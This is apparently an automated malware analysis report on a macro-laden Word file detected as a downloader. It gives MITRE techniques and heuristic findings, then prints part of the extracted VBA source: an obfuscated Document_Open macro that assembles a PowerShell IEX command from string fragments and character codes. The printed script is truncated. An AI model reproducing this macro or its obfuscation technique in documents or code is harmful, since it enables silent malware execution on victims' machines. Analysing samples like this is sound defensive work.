MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute arbitrary code. This indicates an attempt to download and run a second-stage payload. The ClamAV detection name 'Doc.Downloader.Valyria-6883060-0' further supports this downloader functionality. No specific malware family could be confidently identified.
Heuristics 6
-
ClamAV: Doc.Downloader.Valyria-6883060-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6883060-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44232 bytes |
SHA-256: 1c67944da9831e9354710184591c3c391fdb463ef7949799ce8934ff3cd7711c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "qSHjfPGQNnksV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
hLLOAW = NfIVW - phGKO + 80220 + XZFiS + (iJQvN / owkMf + 8617 - ROUiX * Uvunk / 3482 - 8935 + PLIGh)
fraorn = TpQwbX - pfUoo + 65591 + iHFziU + (jGjkQJ / SfHIj + 23820 - fRXrT * oPiJf / 72937 - 81236 + kVqMTA)
oqwjuK = FFVaGJ - FDvhN + 97647 + nWfuIA + (lcFwI / dXXucG + 73788 - pSJvvm * HNYTz / 95076 - 627 + QpmJI)
BBOSaX = 52001 * LORBlj - ViLSau - REACr * QGpcZ / oMTfL / 52029 - uMjzJz
fFqivu = 94684 * JRYfKV - Yobhr - BDzrjA * kGqEFc / AzwiJr / 54657 - OmvfZ
GFqwd = 42451 * DhzQs - cMTLkJ - RuqZv * pOhwmw / fYvOL / 66597 - lAoBw
XfZiUfh = Application.Run("EwiZYpDaqsYdwL", "" + cziuifAFH + wDWwNNPdOhiLj + RLclFUw + VMkYoS + odVdXpdn + HvEDjFpp + hEGuNhTEcuC + UsvrrI + lYRhiiaTi + LjfZsd + pQUhjWV + JskaddffN + sizKiACJrOV + MUQBViEEsah + XpBARjKh + szffTRYiz + ojmvKWjdhTV + PDmjjFNG + HNbzozHaS + iPuCiCqm + FzDaUZijFZpwYA)
QddJO = 60750 * BuaHmj - cWwRfU - iUMwQH * VnHnM / SqHhfO / 5005 - jQzjl
oMvEbk = 55335 * IoLZHz - LTPld - nSVwp * iUlqt / mNdqGS / 40237 - GSfOJ
End Sub
Attribute VB_Name = "vhwiIYlIRMz"
Function RLclFUw()
On Error Resume Next
MNwCO = (58324 + 71887 + IZTKWR * KsvEoL) / (95628 + jVzal + 21403 + 72497)
VBnjXBtZE = "" + nNdvVOSZqMcU + BZdzdjPEOq + "PowE" + RDzcWZjYiEPO + mOUluMpbZLhl + "RsH" + Viznjnz + OpDkGnzKPcw + "ell " + jdvCrpi + kCiDAEchjjXoGv + " " + Chr(34) + " " + jocBSJaDUwW + wHklTEABCns + "iEX" + sMZMchEaHBBm + cfiBikDncmC + " ( " + rahAjSlQNdIWp + oGiwrdX + "\" + Chr(34)
mKzdE = (70194 + JppNAa * 1395 * UqKPB + (ftzAz - DDvOT + MOZVI - 22986 - (56015 * wjzaDN * 10727 / iBSIV)))
RzcFO = (67435 + ubtwO * 73317 * whwlKb + (tXzlQn - tvLiR + IVfGO - 15342 - (86085 * XjGzTY * 61306 / TWLTI)))
lWkCvQOzSpj = "" + TwvhAjiOwij + sXCiMVq + " $(" + wOtZboXwzltA + LLlrwsCoo + "SE" + bzIlwBlph + nbEtrwfwkBFH + "t-I" + aiswjHaqHA + MCjHLFOiX + "tEm" + EAEJpRQVrSOVW + ztHzTEEdlcPcq + " 'va" + LwPrnzfwkYriz + jMOUHUXaqizXSj + "RI" + ZVwHPFfFtSvWY + HinvCOWsZoY + "ab" + oZMRJjRI + ibhJapYABOIsp + "lE:o"
XbCdZT = (83349 + WQUFdM * 78870 * RItEU + (EwCAn - Kzwkh + lIOfZU - 83275 - (89207 * sFkvn * 24943 / rjvaQ)))
owstVdjLPbX = "" + aYfUVWU + wajvmiZNaK + "FS' " + SEzJHIMoHRjmI + pWYnYVN + " '"
jHEBW = (25578 + rKPITj * 22237 * OHvQf + (unhhjq - XnUEG + czELSt - 52719 - (83836 * twhIKK * 48842 / azTVl)))
UmWnU = (44603 + DNtiOJ * 93982 * WEATtl + (bjrwW - HnRrfh + fXnXEz - 86411 - (37177 * cvPTw * 51157 / VSalT)))
DPTnkQqO = "" + VAAvacrjcFwwQc + sjMEviDzhXwYEw + "' " + hrBDzzslkM + wbwsEisnw + ") \"
nzDOC = (62633 + ffjdR * 48785 * KwvoaT + (upwFZD - ZEjVv + OGtjpF - 33232 - (63530 * iUKZR * 87297 / zwYSRs)))
dOUQj = "" + dczFbzIW + DEMwVCCmL + Chr(34) + " " + AmatHlzcZVzpaM + bjfMnqEpa + Chr(43) + " " + DQOFwaN + YLUOLtJrEPlms + "[S" + FfRHJilSWkt + PDONjmtQ + "TRiN" + AujMlLzOK + zQJFTInszdRhw + "g]["
AYCGr = (20941 + OQMdVz * 14165 * WjfXQ + (FHQdFX - njNil + KbLEpc - 12588 - (4361 * sqmolb * 13521 / BbLOvQ)))
mniahz = (90219 + PwvKfq * 88841 * kMOaq + (mnjAL - ZVPKZ + DpcbLs - 90642 - (4913 * ojwDL * 64338 / iiBMm)))
dNvjL = "" + ujooKujklDnEh + WfoszHk + "ChAr" + ZXqhJMo + lhiEGrdIvKzXc + "[]] " + jfhwbEjJjo + EzbZOEQwbXRYw + "( 36" + LazcwDUAdfqGj + uQrEZIUlkS + " ,83"
tUdoID = UpKXr + Uidrj + cJWih * 88498 + CiEKH / XiFMRO
uJNJB = OYjmM + jkwzt + whuDc * 2969 + rpjqpM / kfZrQ
aHJimk = "" + WAVTwAoG + LDtfWmvuiAqQ + " , " + qTdPSMc + UnWMOvZOb + "82 ," + wddDiZVUmwR + SciWZnoEzp + "106"
DtULP = wsvzva + XLzfv + GwawcK * 48152 + OwsDnw / znfiV
AZhwJm = NBHNp + jsrIZ + CjAtl * 32460 + ooOYw / ELiAnV
VvURE = "" + tRcWQjAiUrnVLc + AqEiuCtIdOYYU + ", 61" + GADhhAoIENQ + zawWsnhf + " ,1" + AqYUsBIcNX + VIvNrMiAVdfh + "10" + SBfjPvk + rJfvGwl + " ,10" + uSFobfvVwWCXKq + jGzjHWwrFEEMQ + "1, 1" + jbfnpw
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.